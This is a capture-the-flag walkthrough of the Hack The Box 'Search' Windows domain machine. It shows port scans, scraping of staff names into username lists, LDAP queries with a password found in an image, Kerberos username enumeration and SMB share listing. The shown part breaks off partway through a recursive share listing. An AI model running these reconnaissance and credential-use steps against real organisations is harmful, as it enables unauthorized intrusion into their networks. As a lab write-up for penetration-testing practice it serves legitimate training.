Search
Completed on April 23, 2022.
Last updated
Was this helpful?
Completed on April 23, 2022.
Last updated
Was this helpful?
Hopefully you like this machine as much as I did. When I worked on it, I was getting ready to start working on the OSCP training (PEN-200), and was looking for practice before starting. At this point, I had finished the eCPPT almost month ago. As almost all the HTB machines, this one goes a bit overboard so it is definitely a good practice in my opinion. It requires a thorough enumeration more than the techniques used to pwn the system. The references I share below should help out understanding what is involved.
As we need to know what is available to us, we need to enumerate the exposed services to get some initial information and then dig deeper. Let's start by finding open ports…
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ sudo nmap -Pn -sS -p- --min-rate=1000 -T4 search.htb -oN Search_openPorts.log -oX Search_openPorts.xml
[sudo] password for jxberrios:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-19 22:07 EDT
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.041s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
8172/tcp open unknown
9389/tcp open adws
49666/tcp open unknown
49693/tcp open unknown
49694/tcp open unknown
49710/tcp open unknown
49724/tcp open unknown
49754/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 124.97 seconds
…followed by further port scanning:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ PORTS=$(cat Search_openPorts.log | grep -E 'tcp.*open' | cut -d '/' -f 1 | xargs | sed -e 's/ /,/g')
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 -T4 search.htb -oN Search_PortScan.log -oX Search_PortScan.xml
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-19 22:21 EDT
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Search — Just Testing IIS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-20 02:20:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
| http-methods:
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
|_http-title: Search — Just Testing IIS
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
|_http-title: Site doesn't have a title.
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49693/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49694/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49724/tcp open msrpc Microsoft Windows RPC
49754/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-20T02:21:36
|_ start_date: N/A
|_clock-skew: mean: -1m23s, deviation: 0s, median: -1m23s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.96 seconds
From the port scan we have lot of good information to start with. What we know so far is:
Domain: search.htb
Command Name: research
Inspecting TCP80 leads to a static page and references to jpg files:
Doing the same on TCP443 leads to the same page but there is a certificate bound to the service and the hostname research.search.htb associated with the certificate. This is the hostname related to the common name found in some services:
Note: Adding the CN research.search.htb to the hosts file.
As both http and https sites reference the same application, we find some “employees” that might come in handy:
For the sake of clarifying, exposing a web application on HTTP when it is supposed to on on HTTPS is not something that should not be done for security reasons. Pulling a list of employees to then create a username combination:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ curl -sLkX GET --url "http://search.htb/#team-section" | grep -E '.*<h3>.*<\/h3>' | head -n 8 | tr -s ' ' | sed 's/^\s//' | sed 's/[/<>h3]//g'
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Tompson
Cris StewartWith these names we can build a list of common usernames based on typical naming conventions. See below if desired.
KLyons
DSantiago
SFrye
KStewart
KSpencer
DSimpson
BTompson
CStewart
K.Lyons
D.Santiago
S.Frye
K.Stewart
K.Spencer
D.Simpson
B.Tompson
C.Stewart
Keely.Lyons
Dax.Santiago
Sierra.Frye
Kyla.Stewart
Kaiara.Spencer
Dave.Simpson
Ben.Tompson
Cris.Stewart
As part of our enumeration on HTTP/HTTPS, let's enumerate directories:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ dirb http://research.search.htb/ /opt/seclists/Discovery/Web-Content/common.txt -t -l -N 401,403,404 -w -f
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Apr 22 19:27:21 2022
URL_BASE: http://research.search.htb/
WORDLIST_FILES: /opt/seclists/Discovery/Web-Content/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Ignoring NOT_FOUND code -> 401
OPTION: NOT forcing an ending '/' on URLs
OPTION: Not Stopping on warning messages
-----------------
GENERATED WORDS: 4710
---- Scanning URL: http://research.search.htb/ ----
==> DIRECTORY: http://research.search.htb/Images/
==> DIRECTORY: http://research.search.htb/certenroll/
==> DIRECTORY: http://research.search.htb/css/
==> DIRECTORY: http://research.search.htb/fonts/
==> DIRECTORY: http://research.search.htb/images/
+ http://research.search.htb/index.html (CODE:200|SIZE:2968)
==> DIRECTORY: http://research.search.htb/js/
+ http://research.search.htb/staff (CODE:403|SIZE:1233)
---- Entering directory: http://research.search.htb/Images/ ----
---- Entering directory: http://research.search.htb/certenroll/ ----
---- Entering directory: http://research.search.htb/css/ ----
---- Entering directory: http://research.search.htb/fonts/ ----
---- Entering directory: http://research.search.htb/images/ ----
---- Entering directory: http://research.search.htb/js/ ----
-----------------
END_TIME: Fri Apr 22 19:54:26 2022
DOWNLOADED: 32970 - FOUND: 2
From the directory/page enumeration, it is worth noting there is a ’certificate enrollment’ directory and most probably this is a user certificate enrollment service, but at the moment the key question is what is it for? While inspecting thoroughly, we found a picture with some notes and when we inspected the notes it had a message giving out a clue:
Looking suspicious enough to look into this user and what seems to be its password. Given our naming convention first.last, we can compose it as:
Hope Sharp -> hope.sharp
Password: 'IsolationIsKey?'
Regardless of having some potential access, we should try and enumerate LDAP with no credentials if we are looking to do an assessment, and even when the service asks for authentication, some good info can still be retrieved.
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=search,DC=htb
namingcontexts: CN=Configuration,DC=search,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=search,DC=htb
namingcontexts: DC=DomainDnsZones,DC=search,DC=htb
namingcontexts: DC=ForestDnsZones,DC=search,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -b "DC=search,DC=htb" -s one
# extended LDIF
#
# LDAPv3
# base <DC=search,DC=htb> with scope oneLevel
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
We can retrieve the naming contexts but anything else requires authentication. Use ldapsearch against the Users base Object to test credentials:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -D 'SEARCH\hope.sharp' -w 'IsolationIsKey?' -b 'CN=Users,DC=search,DC=htb' 'objectClass=user'
# extended LDIF
#
# LDAPv3
# base <CN=Users,DC=search,DC=htb> with scope subtree
# filter: objectClass=user
# requesting: ALL
#
# Administrator, Users, search.htb
dn: CN=Administrator,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Administrator
description: Built-in account for administering the computer/domain
userCertificate:: MIIF2jCCBMKgAwIBAgITVAAAAAVaQrAT7+sADQAAAAAABTANBgkqhkiG9w0B
AQsFADBKMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMRswGQYDV
QQDExJzZWFyY2gtUkVTRUFSQ0gtQ0EwHhcNMjAwNDA3MTEyMzA5WhcNMjEwNDA3MTEyMzA5WjBVMR
MwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMQ4wDAYDVQQDEwVVc2V
yczEWMBQGA1UEAxMNQWRtaW5pc3RyYXRvcjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
ALmINUCLzjvz8M7ZYeAecIw1ZF0dLJDnseKfI3BMM4rxu7G7hJ8kL5HmcxFWINzLWCO5bKNyYtLGq
H6Cb9FsSezc6tW/z22rXkt5Qho0DgBlgRNvFLhmHonviwk2RPXO3gHcjBL/4WDTMjPi38739CtP6l
oRPqrEephRE8CRMQUaGDbUTC2Xs1/Z0LPwVdemV8Nwm3O00MdsFMbCWn/hty3Hxo5ZMTqKsnz+Wml
PqVwdkEKBe1k9tKVD8qpC6cQpIbm3qdobFzaLkHamIf2Bvo+/Uy2OvSOifMw1mGJJwbeLeT1kDsVI
pP0gGh6ZdiaZSRhIXGE7DqrFISzi3TRRcoECAwEAAaOCAqwwggKoMBcGCSsGAQQBgjcUAgQKHggAV
QBzAGUAcjApBgNVHSUEIjAgBgorBgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQ
H/BAQDAgWgMEQGCSqGSIb3DQEJDwQ3MDUwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDA
HBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUar7IemvyH1eMJoKVYsu98hlqNtcwHwYDVR0j
BBgwFoAUapGteyhvtUimWzjOvGKqX+dX7FAwgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6L
y8vQ049c2VhcmNoLVJFU0VBUkNILUNBLENOPVJlc2VhcmNoLENOPUNEUCxDTj1QdWJsaWMlMjBLZX
klMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXNlYXJjaCxEQz1odGI
/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
blBvaW50MIHDBggrBgEFBQcBAQSBtjCBszCBsAYIKwYBBQUHMAKGgaNsZGFwOi8vL0NOPXNlYXJja
C1SRVNFQVJDSC1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZX
MsQ049Q29uZmlndXJhdGlvbixEQz1zZWFyY2gsREM9aHRiP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmp
lY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MDMGA1UdEQQsMCqgKAYKKwYBBAGCNxQCA6Aa
DBhBZG1pbmlzdHJhdG9yQHNlYXJjaC5odGIwDQYJKoZIhvcNAQELBQADggEBAILhtyleim0/vZoXl
JMgBxLEeNZ63bsint0+6IvP+yTBA4ISqoGLYIsDyOoYdecpykjyjUrQusxqwJBslyYONQ7YBgEzmW
Db9vlnqUCVWiN1fEtTHUkYzts0oUORVMOHQqpT4P0ktbrupngFClgw/F8n4LDNw7+QuudaKx7hX/J
bO61uwS7YZ1ycQPlApAOoxWgY8UsBh0X0aEfwBDTN4/6+1O7ur9HVPx3NkdPNcjmBkm8XmPqhf2nM
ydESLU+jwZGmrCxFThJFuYLSGpKQzKMeFbVC7NlIx/bDlScKjEZ+0rvxKr/d5d24LIQChXLxLUnWg
FdrY2mB8twsL2Z5z80=
userCertificate:: MIIF2jCCBMKgAwIBAgITVAAAAAS4VoSkRjxsHQAAAAAABDANBgkqhkiG9w0B
AQsFADBKMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMRswGQYDV
QQDExJzZWFyY2gtUkVTRUFSQ0gtQ0EwHhcNMjAwNDA3MTExNzEwWhcNMjEwNDA3MTExNzEwWjBVMR
MwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMQ4wDAYDVQQDEwVVc2V
yczEWMBQGA1UEAxMNQWRtaW5pc3RyYXRvcjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AN63rj3DSVXg22+lcsAoqCNVMCWxRG/hzxsIFZUQY5aWQdno2CyYbY+i/om5J7Q7xjTSqU0u3btbb
AYmG/yD1WdpaELFmjeJ8fM+Jk74eeAZjO8zzxtCGhPKa9a4XbDw3QVZNm0YIOCrTr+qpO7s/Dhp/Q
LWvzLD/sVWl/0TzxjT3dmBWTDK5ezYt0lakVu8DhMT/QuTZxlb/NIYD1OqScl4M3xoIJoTDeSgBUg
K/YdfAOICxrm7CrJLj22WcnocDj+hDvPDW8eh2Z2KJLbbkytNPEEfz3g0MKuUfONvNK6Xq60JfaN4
+5gfsSFTmfcRqd4qmWGehcM9UVgSOPdnfzECAwEAAaOCAqwwggKoMBcGCSsGAQQBgjcUAgQKHggAV
QBzAGUAcjApBgNVHSUEIjAgBgorBgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQ
H/BAQDAgWgMEQGCSqGSIb3DQEJDwQ3MDUwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDA
HBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQU10U6bi0rwCTCoxT09cJR0AbQL1UwHwYDVR0j
BBgwFoAUapGteyhvtUimWzjOvGKqX+dX7FAwgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6L
y8vQ049c2VhcmNoLVJFU0VBUkNILUNBLENOPVJlc2VhcmNoLENOPUNEUCxDTj1QdWJsaWMlMjBLZX
klMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXNlYXJjaCxEQz1odGI
/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
blBvaW50MIHDBggrBgEFBQcBAQSBtjCBszCBsAYIKwYBBQUHMAKGgaNsZGFwOi8vL0NOPXNlYXJja
C1SRVNFQVJDSC1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZX
MsQ049Q29uZmlndXJhdGlvbixEQz1zZWFyY2gsREM9aHRiP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmp
lY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MDMGA1UdEQQsMCqgKAYKKwYBBAGCNxQCA6Aa
DBhBZG1pbmlzdHJhdG9yQHNlYXJjaC5odGIwDQYJKoZIhvcNAQELBQADggEBAIGN30BMcH57jgTPU
iy8VNNDZ6ykF4VMke5mrO3W+kOjW0U8AuowVlBIng1HhWGSNgBEvacFlA1sEnC3cTAVag57eH4Ov7
uRgBtZ3h9AO2CKm1RtvVvqjXLP4wmOk7cTBocV3RwuT+CoDFzPRa+9ZD5HRQMPUgshYgBPz96G8t3
USFTnI8jePGBF9uDUy19ujpw2gGlh9JkEvCTeR8FNvjPljRsw4DM8sJrOd5RJm6p1NTx/uCodIgGr
qKgKQMRKLVOQ8l5NMUDXsc1ozclpiiHCH6foanyZWU2ZJ/hacXCMq2B18gwknwAxn6Ai1CEa3PzoV
YROF/I4JvNfy1XL8DQ=
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141835.0Z
whenChanged: 20220413105646.0Z
uSNCreated: 8196
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
uSNChanged: 213062
name: Administrator
objectGUID:: pc4v2f1XX0OmXLqrv/Edgw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132943234160414333
lastLogoff: 0
lastLogon: 132951144927723973
pwdLastSet: 132313451094143670
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9AEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 866
sAMAccountName: Administrator
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010714042016.0Z
lastLogonTimestamp: 132943210066516943
msDS-SupportedEncryptionTypes: 0
# Guest, Users, search.htb
dn: CN=Guest,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Guest
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=Guest,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141835.0Z
whenChanged: 20200331141835.0Z
uSNCreated: 8197
memberOf: CN=Guests,CN=Builtin,DC=search,DC=htb
uSNChanged: 8197
name: Guest
objectGUID:: ulsgEdc6F0mO1JMHdczXCA==
userAccountControl: 66082
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 0
primaryGroupID: 514
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9QEAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Guest
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010101000417.0Z
# krbtgt, Users, search.htb
dn: CN=krbtgt,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: krbtgt
description: Key Distribution Center Service Account
distinguishedName: CN=krbtgt,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141936.0Z
whenChanged: 20211214201649.0Z
uSNCreated: 12324
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=search,DC=htb
uSNChanged: 180281
showInAdvancedViewOnly: TRUE
name: krbtgt
objectGUID:: aZ2LlY6VY0igOk+ajvf3mg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132301379764357878
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9gEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: krbtgt
sAMAccountType: 805306368
servicePrincipalName: kadmin/changepw
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010101181216.0Z
msDS-SupportedEncryptionTypes: 0
# Tristan Davies, Users, search.htb
dn: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Tristan Davies
sn: Davies
description: The only Domain Admin allowed, Administrator will soon be disable
d
givenName: Tristan
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200408163602.0Z
whenChanged: 20220422144632.0Z
displayName: Tristan Davies
uSNCreated: 24817
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
uSNChanged: 253025
name: Tristan Davies
objectGUID:: BG7UG1fgykOF22w51h8LBw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132406600358324634
lastLogoff: 0
lastLogon: 132406781797503096
pwdLastSet: 132427526509705890
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1vEgUAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 4
sAMAccountName: Tristan.Davies
sAMAccountType: 805306368
userPrincipalName: Tristan.Davies@search.htb
lockoutTime: 0
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
dSCorePropagationData: 20220422152132.0Z
dSCorePropagationData: 20220422151632.0Z
dSCorePropagationData: 20220422151132.0Z
dSCorePropagationData: 20220422150632.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132416141844196476
# search result
search: 2
result: 0 Success
# numResponses: 5
# numEntries: 4
Along with some users, we can see user certificate information from the Administrator user.
Using the username list we created from the people found on the web application, we can try and confirm if those are valid users.
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ kerbrute userenum --dc search.htb -d search.htb usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 04/21/22 - Ronnie Flathers @ropnop
2022/04/21 00:55:41 > Using KDC(s):
2022/04/21 00:55:41 > search.htb:88
2022/04/21 00:55:41 > [+] VALID USERNAME: Keely.Lyons@search.htb
2022/04/21 00:55:41 > [+] VALID USERNAME: Sierra.Frye@search.htb
2022/04/21 00:55:41 > [+] VALID USERNAME: Dax.Santiago@search.htb
2022/04/21 00:55:42 > Done! Tested 24 usernames (3 valid) in 0.374 seconds
This gave us three AD accounts that exist. By using enum4linux, we found some interesting group memberships and other users retrieved through LDAP:
Group: 'Schema Admins' (RID: 518) has member: SEARCH\Administrator
Group: 'Schema Admins' (RID: 518) has member: SEARCH\Tristan.Davies
Group: 'Domain Admins' (RID: 512) has member: SEARCH\Administrator
Group: 'Domain Admins' (RID: 512) has member: SEARCH\Tristan.Davies
Group: 'Group Policy Creator Owners' (RID: 520) has member: SEARCH\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: SEARCH\Tristan.DaviesAt this point, we could pull more information valuable using Bloodhound and might save us some effort, but we can leave for a later stage so we go through the process.
Looking specifically at the shares this account has access to:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'hope.sharp' -p 'IsolationIsKey?' -d SEARCH
[+] IP: search.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
There we see there is a share that can be accessed with this credential. Let's take a look:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\hope.sharp'%'IsolationIsKey?'
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> ls
. Dc 0 Fri Apr 22 11:47:28 2022
.. Dc 0 Fri Apr 22 11:47:28 2022
abril.suarez Dc 0 Tue Apr 7 14:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 09:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 08:35:32 2020
belen.compton Dc 0 Tue Apr 7 14:32:31 2020
Cameron.Melendez Dc 0 Fri Jul 31 08:37:36 2020
chanel.bell Dc 0 Tue Apr 7 14:15:09 2020
Claudia.Pugh Dc 0 Fri Jul 31 09:09:08 2020
Cortez.Hickman Dc 0 Fri Jul 31 08:02:04 2020
dax.santiago Dc 0 Tue Apr 7 14:20:08 2020
Eddie.Stevens Dc 0 Fri Jul 31 07:55:34 2020
edgar.jacobs Dc 0 Thu Apr 9 16:04:11 2020
Edith.Walls Dc 0 Fri Jul 31 08:39:50 2020
eve.galvan Dc 0 Tue Apr 7 14:23:13 2020
frederick.cuevas Dc 0 Tue Apr 7 14:29:22 2020
hope.sharp Dc 0 Thu Apr 9 10:34:41 2020
jayla.roberts Dc 0 Tue Apr 7 14:07:00 2020
Jordan.Gregory Dc 0 Fri Jul 31 09:01:06 2020
payton.harmon Dc 0 Thu Apr 9 16:11:39 2020
Reginald.Morton Dc 0 Fri Jul 31 07:44:32 2020
santino.benjamin Dc 0 Tue Apr 7 14:10:25 2020
Savanah.Velazquez Dc 0 Fri Jul 31 08:21:42 2020
sierra.frye Dc 0 Wed Nov 17 20:01:46 2021
trace.ryan Dc 0 Thu Apr 9 16:14:26 2020
\abril.suarez
. Dc 0 Tue Apr 7 14:12:58 2020
.. Dc 0 Tue Apr 7 14:12:58 2020
Desktop DRc 0 Fri Jul 31 08:19:29 2020
Documents DRc 0 Fri Jul 31 08:19:33 2020
Downloads DRc 0 Fri Jul 31 08:19:30 2020
...
\frederick.cuevas\Downloads
NT_STATUS_ACCESS_DENIED listing \frederick.cuevas\Downloads\*
\hope.sharp\Desktop
. DRc 0 Thu Apr 9 10:35:49 2020
.. DRc 0 Thu Apr 9 10:35:49 2020
$RECYCLE.BIN DHSc 0 Thu Apr 9 10:35:49 2020
desktop.ini AHSc 282 Thu Apr 9 10:35:00 2020
Microsoft Edge.lnk Ac 1450 Thu Apr 9 10:35:38 2020
\hope.sharp\Documents
. DRc 0 Thu Apr 9 10:35:50 2020
.. DRc 0 Thu Apr 9 10:35:50 2020
$RECYCLE.BIN DHSc 0 Thu Apr 9 10:35:51 2020
desktop.ini AHSc 402 Thu Apr 9 10:35:03 2020
\hope.sharp\Downloads
. DRc 0 Thu Apr 9 10:35:49 2020
.. DRc 0 Thu Apr 9 10:35:49 2020
$RECYCLE.BIN DHSc 0 Thu Apr 9 10:35:49 2020
desktop.ini AHSc 282 Thu Apr 9 10:35:02 2020
\jayla.roberts\Desktop
NT_STATUS_ACCESS_DENIED listing \jayla.roberts\Desktop\*
...
\Savanah.Velazquez\Downloads
NT_STATUS_ACCESS_DENIED listing \Savanah.Velazquez\Downloads\*
\sierra.frye\Desktop
. DRc 0 Wed Nov 17 20:08:00 2021
.. DRc 0 Wed Nov 17 20:08:00 2021
$RECYCLE.BIN DHSc 0 Tue Apr 7 14:03:59 2020
desktop.ini AHSc 282 Fri Jul 31 10:42:15 2020
Microsoft Edge.lnk Ac 1450 Tue Apr 7 08:28:05 2020
user.txt Ac 33 Wed Nov 17 19:55:27 2021
\sierra.frye\Documents
NT_STATUS_ACCESS_DENIED listing \sierra.frye\Documents\*
\sierra.frye\Downloads
NT_STATUS_ACCESS_DENIED listing \sierra.frye\Downloads\*
\trace.ryan\Desktop
